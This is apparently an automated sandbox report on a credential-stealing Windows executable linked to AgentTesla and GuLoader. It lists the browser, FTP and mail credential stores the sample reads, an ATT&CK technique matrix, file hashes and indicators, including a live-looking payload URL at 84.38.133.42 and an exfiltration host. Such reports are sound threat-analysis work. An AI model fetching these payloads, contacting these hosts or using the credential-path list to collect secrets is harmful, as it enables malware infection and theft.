            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeProcess created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"Jump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeQueries volume information: C:\Users\user\Desktop\u9aPQQIwhj.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\u9aPQQIwhj.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            11
            Process Injection
            1
            Masquerading
            2
            OS Credential Dumping
            311
            Security Software Discovery
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            Credentials in Registry
            141
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares2
            Data from Local System
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets3
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials226
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            u9aPQQIwhj.exe5%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://api.ipify.org/t0%URL Reputationsafe
            http://crl.microsoft0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            172.67.74.152
            truefalse
              unknown
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                  • URL Reputation: safe
                  unknown
                  http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.binfalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.binYu9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://www.wikihow.com/Image:Type-Step-1-Version-6.jpgu9aPQQIwhj.exe, 00000000.00000002.2410008030.0000000002763000.00000004.00000020.00020000.00000000.sdmp, nsw3DE5.tmp.0.dr, 660.jpg.0.drfalse
                        unknown
                        https://api.ipify.orgu9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://ftp.concaribe.comu9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          http://nsis.sf.net/NSIS_ErrorErroru9aPQQIwhj.exefalse
                          • URL Reputation: safe
                          unknown
                          http://concaribe.comu9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://api.ipify.org/tu9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.microsoftu9aPQQIwhj.exe, 00000004.00000002.2937245380.0000000038B21000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameu9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            84.38.133.42
                            unknownLatvia
                            203557DATACLUB-NLfalse
                            192.185.13.234
                            concaribe.comUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            172.67.74.152
                            api.ipify.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1546022
                            Start date and time:2024-10-31 11:43:10 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 38s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:u9aPQQIwhj.exe
                            renamed because original name is a hash value
                            Original Sample Name:7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/9@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 160
                            • Number of non-executed functions: 83
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: u9aPQQIwhj.exe
                            TimeTypeDescription
                            06:45:30API Interceptor302x Sleep call for process: u9aPQQIwhj.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            84.38.133.42Shipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.42/FZBmQQQpasdj30.bin
                            192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                            172.67.74.15267065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                            • api.ipify.org/
                            y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                            • api.ipify.org/
                            2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            api.ipify.orgShipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 172.67.74.152
                            file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                            • 104.26.13.205
                            Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                            • 104.26.12.205
                            #Uad6c#Ub9e4 #Uc8fc#Ubb38 658749 #Ubc0f 658752..exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 172.67.74.152
                            https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                            • 104.26.13.205
                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                            • 104.26.12.205
                            https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
                            • 104.26.12.205
                            SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.12.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            UNIFIEDLAYER-AS-1USShipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 192.185.13.234
                            HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                            • 162.241.63.77
                            MP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 192.185.118.238
                            Receipt.htmGet hashmaliciousUnknownBrowse
                            • 69.49.245.172
                            SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exeGet hashmaliciousFormBookBrowse
                            • 162.241.63.77
                            http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                            • 192.185.20.145
                            Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 192.185.13.234
                            z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                            • 50.116.93.185
                            z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                            • 50.116.93.185
                            Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                            • 50.116.93.185
                            DATACLUB-NLShipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.133.42
                            QUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 84.38.133.160
                            Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 84.38.129.16
                            Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 84.38.129.16
                            PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 185.29.11.116
                            PO-94858.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 185.29.11.116
                            Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.29.11.116
                            Order 10172024.bat.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.29.11.116
                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                            • 185.29.11.111
                            Upit 220062.xlsGet hashmaliciousRemcosBrowse
                            • 185.29.11.111
                            CLOUDFLARENETUSShipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 172.67.74.152
                            https://www.transfernow.net/dl/20241030KnXGth9fGet hashmaliciousUnknownBrowse
                            • 104.26.15.166
                            file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                            • 104.26.13.205
                            file.exeGet hashmaliciousLummaCBrowse
                            • 188.114.96.3
                            https://flaviarc.com/vrecord%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousHTMLPhisherBrowse
                            • 104.18.3.157
                            Eprdtdrqbr.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 188.114.96.3
                            N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 188.114.96.3
                            HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                            • 172.67.177.220
                            Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            24602711 Inv_Or.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            • 188.114.96.3
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eShipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 172.67.74.152
                            https://alaskan.s3.eu-north-1.amazonaws.com/muna.html?login=abc@everbridge.com&pcnt=3&no_redrct=no_redrct&request_type=cancel_requestGet hashmaliciousUnknownBrowse
                            • 172.67.74.152
                            https://www.transfernow.net/dl/20241030KnXGth9fGet hashmaliciousUnknownBrowse
                            • 172.67.74.152
                            Contrato.exeGet hashmaliciousDarkCloudBrowse
                            • 172.67.74.152
                            Eprdtdrqbr.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 172.67.74.152
                            N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 172.67.74.152
                            Proforma Invoice.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            MP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.74.152
                            Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                            • 172.67.74.152
                            clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                            • 172.67.74.152
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dllShipping documents 000293994900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              whatsappjpg.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                WEAREX_IHRACAT.exeGet hashmaliciousGuLoaderBrowse
                                  WEAREX_IHRACAT.exeGet hashmaliciousGuLoaderBrowse
                                    sample.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      sample.exeGet hashmaliciousGuLoaderBrowse
                                        8737768___19082024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                          8737768___19082024.vbsGet hashmaliciousGuLoaderBrowse
                                            Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                                              Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):50
                                                Entropy (8bit):4.558562939644915
                                                Encrypted:false
                                                SSDEEP:3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
                                                MD5:A6216EF9FBE57B11DEEB1B1FD840C392
                                                SHA1:E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
                                                SHA-256:EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
                                                SHA-512:AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11264
                                                Entropy (8bit):5.813979271513012
                                                Encrypted:false
                                                SSDEEP:192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
                                                MD5:7399323923E3946FE9140132AC388132
                                                SHA1:728257D06C452449B1241769B459F091AABCFFC5
                                                SHA-256:5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
                                                SHA-512:D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: Shipping documents 000293994900.exe, Detection: malicious, Browse
                                                • Filename: whatsappjpg.exe, Detection: malicious, Browse
                                                • Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse
                                                • Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse
                                                • Filename: sample.exe, Detection: malicious, Browse
                                                • Filename: sample.exe, Detection: malicious, Browse
                                                • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                                                • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                                                • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                                                • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):927942
                                                Entropy (8bit):5.501761489288064
                                                Encrypted:false
                                                SSDEEP:12288:7TrjZjiGBM/3Ptm9qGRd9lyHuqdKZKyYiErGp7HvDgK/:XO/ftmsedfOuVgdGp7PDgQ
                                                MD5:25A76CE5339D0D2B0BCF54E0D640BE94
                                                SHA1:741CB370E32C57F65A221106016AD15DEB5D1164
                                                SHA-256:D2BB13CACD56FFB3BF0B0286F1EC22C7D5109297D0286995F15A18D3865D72A5
                                                SHA-512:78F26A106A273ECA500F799B1AE02AB74FBF3169AEBDEEF27B57218B4F1668948A1F21F5845F44F796FEEB0AC33EC27FC386C63761267605A69FC31008AC3E47
                                                Malicious:false
                                                Reputation:low
                                                Preview:.B......,...............................$B.......B..........................o...............................................................................................................................................................................................................G...b...............j...............................................................................................................................S...........D...f...r...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):437516
                                                Entropy (8bit):7.536847087289815
                                                Encrypted:false
                                                SSDEEP:6144:BRAiPjrWGBM5nf/3DUInCaur79qGdHd+aA48KyHPWBwwRZyI+6K0ebKa9OKyaxTP:BjiGBM/3Ptm9qGRd9lyHuqdKZKyYiE7
                                                MD5:A62CB80618398C90AFACDC9825A5D293
                                                SHA1:90ACCF3F0D9C9E8D53531A3106192D61D240CE81
                                                SHA-256:D67096FE71FAC97FEEF92248F7596F5F2B611583A8AC90B93B674C33F5F79257
                                                SHA-512:507CD9E21739638D051CFD15C1EA3F89728B900E9220361B76399AAB26FF444697CD55796D8E22F2E587AE823B85D2FF28E5D0F279AAE17102E08BAEF75E04CB
                                                Malicious:false
                                                Reputation:low
                                                Preview:...........(.WWW...............................:.............=........MMMMM.................................bbb..............TT....e...999......4444......++.....!...............................................................NNN.UU.rrr.......[......r.&.........333................................{..MM.ZZ..V....^^.##..,,,..qqqqq......'.......... ...........................................qq....z.Y..-...............dd..Q.ff....j.....66.]]]]..k.....SS.........FFF.......==...................!........ii....J.X...................D......................x..F.####..r....hhh................................aaaaa...............................................J...........!..gggg.......LL..................1............99.........#...................................................k.uu...................e.......................QQ.....''...........\\\...............................................////.==.|....\......Y..V.........m.............KKKKKK.....n..%.......+....ff.......'.]].rr..._....=...r....
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "File source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg", baseline, precision 8, 550x309, components 3
                                                Category:dropped
                                                Size (bytes):32980
                                                Entropy (8bit):7.966258347557809
                                                Encrypted:false
                                                SSDEEP:768:FU6UE3Rk9Eo7uT/59xGBxipyyZ4D9iBao1htGs5AQ:y6UZE3D5v34D9wL1XGnQ
                                                MD5:976F85DF642FE509973BCC05E4A32C2B
                                                SHA1:7A36A94C45039A31FD7A0BAFFCC3ACA8E3AC656A
                                                SHA-256:68B60014573EF5042B6AB616B17BE733AF6E803EA7096036BC3A075790656233
                                                SHA-512:7EA1663835C92E178F3DFBA67BCA0DE52CD5690ED775A67A1A5163E0C4ECF309AA05742B6978206811A2BC95222A823AFE982C1A70D24FACF62A493D4078CDF7
                                                Malicious:false
                                                Reputation:low
                                                Preview:......JFIF.....H.H.....FFile source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg...C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.&...........................................f..........................!1Q.Aa.."q......2RS...#4BTUbru......$%3FVWest..6DEc........&'5CGd......7v.................................3.......................1.!A.Q.2aq."R.3B.....#...r............?...|....@U..P.A@P........(.W..O3R...k(...G....<.,...4..O3B.O3C.ry.A...Q.............(....D.QE.PQ..A5D..T......(.....PM.A5PP...DMA........b...c.K....c.K...E6..q@b.(.P...P..(...`r.Ic..X..Ai.*....0)E.....R..`U..@b.....i..b......Q.(.*w......#}....D....(..@d..4..4.d..<...t.O3B.O3B.O3K.....<.,.<.....FO3P.2y....h..f..<...y....h..f...f...QE;..P...b.....VIb.h...qA!'..RZv..MZ..tj.M.....m..<6..|.jK.>..o.'.J...O.o.'.J...>..H.]J..6....D.....>..H.]*K....k.'.J...>..H.]B..7.zD..ZzF...H.]..#_..O......g.'.JA....T..BzV...J.]Z.J..
                                                Process:C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):380206
                                                Entropy (8bit):2.283052348265357
                                                Encrypted:false
                                                SSDEEP:3072:zZVDR8is0ltz1OWUk+tdYUTn16yd8aXlVDDcwTsKR9A:zZj0COWT+tb6yHXTTsKR9A
                                                MD5:A1DC683D395B4AAD6AADB883922026D6
                                                SHA1:72846E629938F0C24DEB9C8AEAD39A51190E1FF4
                                                SHA-256:80653E80939085343C215D19EB9035353BEB0068AB6EFA11B1BAA4E7D10E1B27
                                                SHA-512:A430DB1C99ACF3A3FFB73754C18A5FF39B0741B9DCBFA6E5A5CD176DF5E90B058C2958336CA98D6194751C087FCB9BA21651EAE594270255BFD5645DC3006144
                                                Malicious:false
                                                Reputation:low
